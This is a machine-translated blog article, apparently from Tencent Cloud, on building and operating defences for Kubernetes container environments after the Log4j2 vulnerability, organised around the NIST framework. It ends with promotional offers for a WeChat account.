preface

In the previous article, we briefly analyzed how to quickly respond to and fix major security vulnerabilities under the cloud native architecture, as well as the challenges and advantages of cloud native architecture for such security emergencies. After the incident, we need to reflect on the pain and think systematically about how to carry out effective security construction and operation in the face of the cloud native architecture, so that we can handle security incidents with ease.

TKE, Tencent’s cloud container service, currently has the largest Kubernetes cluster in China, running multiple application scenarios including games, payment, live streaming and finance. The stable operation of the cluster cannot be separated from the escort of security capabilities. Tencent cloud container security service TCSS has mastered the most cutting-edge cloud native security perspective in the industry, providing continuous guidance for TKE’s security governance and accumulated abundant thinking and best practices.

This paper will combine our security construction and security operation practice, and systematically share our thoughts on security construction and security operation under cloud native architecture.

Security construction and operation under cloud native architecture

Safe operation is the goal, safe capability is the means. Security ability construction has close relationship with safety operation, security ability construction is the foundation of safe operation, one can, better security ability construction safety operation can be more smoothly and as safe operation can also provide security capacity building better input and feedback, make more accurate safety detection and protection ability.

Security capacity building and operation under cloud native architecture is actually a very big topic, which will not be completely covered in this paper due to space limitations. This paper mainly focuses on the typical scenario of LOG4J2 vulnerability, and analyzes the required options of security capacity building from the perspective of security operation.

Traditional security capacity building is essential

First of all, it should be noted that both container security and cloud native security are relatively narrow concepts, which usually only cover the detection and protection of security risks specific to cloud native architecture. From the perspective of security risks, we have always stressed that the security risks under the cloud native architecture are incremental, so in terms of overall security construction, it must be a system of in-depth defense, rather than a product alone.

For example, WAF, firewall, and anti-D of the north-south traffic entrance and exit. If our cloud native is built on the basis of IaaS, then VPC and even the network hierarchical and domain-based isolation and intrusion detection at the underlay level are the foundation of cloud native security construction.

In the emergency treatment of log4j2 vulnerability, we also found that even the container environment can achieve a certain degree of vulnerability mitigation and blocking in the first time by upgrading WAF rules and updating the firewall outbound policy.

In the Tencent Cloud Container Security White Paper released in November 2021, Tencent Cloud also proposed a hierarchical container security system framework, among which a very important part is basic security, which includes the original data center security and the content covered by cloud security construction.

Safe operation drives safety capacity building

For the safety of the systematic construction and safe operation, some technical organizations, as well as standardization organization, also put forward related standard framework, the framework for our on safety construction, has important guidance and reference meaning, here we are in network security framework proposed by NIST, for example as a reference for our cloud native security construction.

Referring to the NIST network security framework, we also divide cloud native security construction into five parallel and continuous steps, namely identification, protection, detection, response and recovery.

Secure identification

(1) Cluster asset identification

Security identification is mainly reflected in asset identification. Assets include Kubernetes resource assets such as Cluster, Node, Namespace, POD, Service, and Container, as well as application asset information such as image repository and container image.

In the cloud native architecture, in addition to the basic asset identification inventory, we also need to be able to discover the logical relationship between potential resources and businesses among these assets. In this way, once new vulnerabilities are detected in an image or corresponding intrusions are detected, all assets and personnel must be automatically identified, the impact range must be discovered, and the security responsible person must be located for quick disposal.

(2) Self-built container identification

In addition to the above recognition ability for standard cluster level assets, it is also necessary to have certain adaptation ability for relatively complex environments such as RESEARCH and development systems. For example, in a RESEARCH and development environment, in addition to standard cluster-level assets, there are self-built assets, such as a user pulling a running container directly with a command such as Docker run.

(3) Business risk identification

From the perspective of safe operation, security identification is also reflected in business risk identification. Security risks need to be clearly defined for clusters and applications. For high-risk applications, higher-level security policies need to be adopted. For example, for core business systems, there should be strict network isolation and access control mechanisms, for directly exposed services, there should be stricter permission control in the container dimension, etc.

Safety protection

With asset and business risk information, you need to rely on basic security capabilities to protect against known threats. The security protection here mainly includes two aspects:

(1) System hardening

• Configure detection and repair

System hardening is an old topic, especially configuration checks and security configuration hardening, but it is especially important in cloud native architectures. Because from the design concept of container, it shares the kernel with the operating system, giving container users more operational space, therefore, the security of configuration will affect the security of the entire system to a large extent.

As can be seen from the main invasion path of container environment mentioned above, attacking container through host is an important path, such as through Docker Remote API. Therefore, security capabilities need to include comprehensive configuration checks.

Configuration hardening is an old problem, but in the cloud native environment, the real implementation of complete security capabilities is still more complicated, including both the reinforcement of basic platforms and components such as Kubernetes, Docker, Istio and other components, but also the configuration of the application software in the image, which is more complicated. We’re not going to expand it here.

From a security operation perspective, we need to be able to harden basic configurations based on the information obtained from configuration checks. At the same time, it is important to strike a balance between security configuration and stable running of services. On the one hand, security must be fully implemented, and on the other hand, service availability and stability must not be affected. In this case, you need to flexibly adjust configuration policies based on service features and security configuration requirements during configuration hardening. This is a continuous process of modification and improvement.

• Vulnerability detection and repair

Repairing known vulnerabilities is also an old topic, including host-level vulnerabilities and mirroring vulnerabilities. For detected vulnerabilities, it is necessary to determine whether to repair and the priority of repair according to the threat level and ease of utilization of vulnerabilities.

• Image security assessment and repair

Container images, as the source of cloud native applications, need more dimensions of security assessment in addition to vulnerabilities. For example, at least the following aspects must be included: Detect sensitive information in the mirror to ensure that no sensitive information is leaked. Image virus Trojan and other malicious file detection, this is mainly for the uncertain source of the public image; Compliance checks for mirror builds, such as the difference in the use of COPY and ADD.

In addition to the detection and repair of the risks mentioned above, zombie image cleaning should also be considered in the security operation, including the cleaning of the mirror warehouse and cluster nodes, which plays an important role in reducing the attack surface.

At the same time, according to different image needs to support the custom inspection rules, different organizational users or image, of different types of business is different to the requirement of security, so in the mirror, on the safety assessment of except based on a set of general testing evaluation rules, also need to support the user’s custom rules, it can combine above business risk identification, Different security rules can be flexibly adopted for different mirrors.

• Risk management

In terms of operation management, a complete closed-loop risk management process is required for the risk information mentioned above, such as configuration and vulnerability, to ensure that risks are fully identified, repaired and confirmed.

(2) Safety protection

In addition to system hardening, you must use related defense capabilities and policies to prevent known intrusion risks at different levels during security defense.

• Access control

Access control, as its name implies, is a basic requirement of DevSecOps to control and block cloud native applications at different stages according to the requirements of security in the full life cycle process. Cloud native architecture, with its flexible resource management and automatic application orchestration, provides sufficient convenience for security control. The value of access control is reflected in the prevention of security risks. On the other hand, after a major 0day outbreak such as Log4j, access control can be used to quickly control the impact surface and prevent additional risks.

From the perspective of life cycle process, access control needs to be implemented from the development (DEV) and runtime (OPS) phases respectively. Access in the research and development stage mainly refers to the detection of security risks such as vulnerabilities and sensitive information in CI and warehousing stages. Only after meeting the security requirements can it enter the next stage of the assembly line. The conditions of entry here usually need to cover the various reinforcement mentioned above.

Access control at runtime is mainly reflected in the deployment and running of applications. Only containers/PODS that meet security requirements can be pulled up and running. The access conditions usually include checking resource restrictions and permission restrictions such as Syscall and Capability.

Similarly, from an operational point of view, in addition to the standard default access control rules, but also need to be able to flexibly adjust and improve according to the application.

• Runtime interception

Under the cloud native architecture, the container is loaded with micro-service applications, so theoretically it should not have the execution of high-authority instructions, which we have made some prevention in the access control. Based on the run-time security capability, we also need to intercept high-risk operations in the container, such as high-risk commands, high-risk system calls, etc., to achieve security in different dimensions of the depth of defense.

• Network isolation

Horizontal scaling is the operation of an attacker after the first attack is achieved, also known as the post-penetration stage. In the design of a cloud native network, it is usually not equipped with any network isolation capability by default. Therefore, you need to set and implement a comprehensive network isolation mechanism to isolate different services from each other.

The network organization form under the cloud native architecture is different from the traditional network based on host or virtual machine. In Kubernetes, the smallest unit of the network is Pod, which carries the business container. Therefore, when implementing network isolation, traditional network policies based on IP addresses and ports are no longer applicable. We need to implement network isolation with different granularity based on resources such as label and service.

• Protection policy management

In the operation process, how to set access control, operation interception, network isolation and other policies is a headache, because it is difficult for security administrators, operation and maintenance administrators, and even developers to fully explain how to configure these rules to achieve the most secure state.

This is one of the challenges of operating safely in the cloud native architecture, and the cloud native architecture itself provides the advantage of addressing this challenge. Mentioned above cloud native architecture is an important feature of the immutable infrastructure, this means that we can through methods such as white list, behavior model, based on the business characteristics and historical operation data, the automatic generation of learning a set of security baseline, the safety baseline, will become the important reference of various kinds of protective policy configuration.

Safety inspection

Security is always an offensive and defensive game process, and the defensive side is often in a relatively inferior position, even can say that there is no unbreakable system.

Under the cloud native architecture, business is becoming more and more open and complicated, the attacker’s means more and more diversified, defense intercept measures mentioned above, is always difficult to deal with all the threats, some advanced directional attack or is zero day vulnerabilities, such as for log4j2 can always easily bypass various defense, let security threats.

Therefore, after all the above defense and interception measures are completed, there is a need for continuous runtime monitoring and security inspection of cloud native systems. Based on the characteristics of cloud native architecture, security detection is divided into two dimensions.

1) Threat detection in the system dimension

It mainly focuses on behaviors within containers, such as process anomaly detection, file anomaly detection, user anomaly detection, etc. Through these fine-grained anomaly detection, attacks such as rights raising and mining can be found.

Threat detection in the network dimension. Although we have set a strict access control strategy in the protection stage, horizontal movement attacks within the network reachable range will still bring important security threats. Network threat detection is mainly divided into two aspects: on the one hand, from the perspective of network behavior, network traffic, especially east-west traffic anomaly detection based on Flow, which will play an important role in port detection, APT attacks, and even detection of new network threats or advanced network threats (NDR); On the other hand, from the perspective of packet, we analyze the packet anomalies between containers to realize the intrusion detection (NIDS) of container network.

2) Threat detection of application dimensions

Also facing horizontal mobility in the post-penetration stage, the micro-service architecture of applications in the cloud native era makes a large number of API calls exist in network communication between containers. Ensuring that all these API calls are safe is of great significance to the security of cloud native applications. For example, in a compromised container, an API can be used to retrieve data from another service, or a malicious parameter can be constructed to attack the associated service. Therefore, we need to implement API call exception detection in the application dimension, such as call behavior, call path, call parameters, and so on.

Security response

The security response refers to the measures taken to handle the security detection alarm in the previous step. In cloud security response under the native architecture, especially the security response on the level of network security, we tend to use the bypass detection  response disposal such operation steps, rather than the traditional network security in tandem to directly access IPS, WAF this type of testing response, this design mainly from the perspective of business performance.

The response to threats mainly includes two aspects:

(1) Disposal

You can handle alarms by isolating the network, suspending the container, stopping abnormal processes, and destroying the container. There is a premise that, in the process of building security capabilities, in view of the short life cycle of containers, it is necessary to implement perfect log and tracing records, so as to achieve traceability forensics after disposal.

In the process of disposal, for certain deterministic anomalies, the disposal operation can be automated by means of one-key blocking and one-key isolation to reduce operating costs.

(2) Traceability

Based on the alarm, log, and tracing data of containers and data association analysis, you can trace the source of alarms, identify attack links, and determine the cause of the intrusion.

Safe repair

In the stage of security repair, there are two aspects: one is to strengthen the repair of the related risks according to the cause of the intrusion; On the other hand, security policies should be updated from reinforcement, protection, detection and other steps to achieve operational feedback.

conclusion

Log4j2 vulnerability has passed for more than a month, I believe that many of the patches have been repaired, this sudden emergency, whether we need to rethink the security construction and security operation under the cloud native architecture. A bug or breach is hard to predict, and we don’t know when it will happen again.

I hope this article can bring some ideas and help to the construction of cloud native security. If you have any suggestions or questions, please leave a message at the end of this article.

About us

Immediately pay attention to [Tencent cloud native] public account, reply “Tiger Tiger Shengwei”, get Tencent customized red envelope cover ~

Benefits:

① Public account background reply [Manual], you can get “Tencent Cloud native Roadmap manual” & “Tencent Cloud native Best Practices” ~

② Public number background reply [series], can get “15 series of 100+ ultra practical cloud original dry goods collection”, including Kubernetes cost reduction and efficiency, K8s performance optimization practices, best practices and other series.

③ Public account background reply [white paper], you can get “Tencent Cloud container Security White Paper” & “Source of Cost reduction – Cloud native Cost Management White Paper V1.0”

“Introduction to the Speed of Light”, you can get Tencent Tencent cloud expert 50,000 words tutorial, introduction to the speed of light Prometheus and Grafana.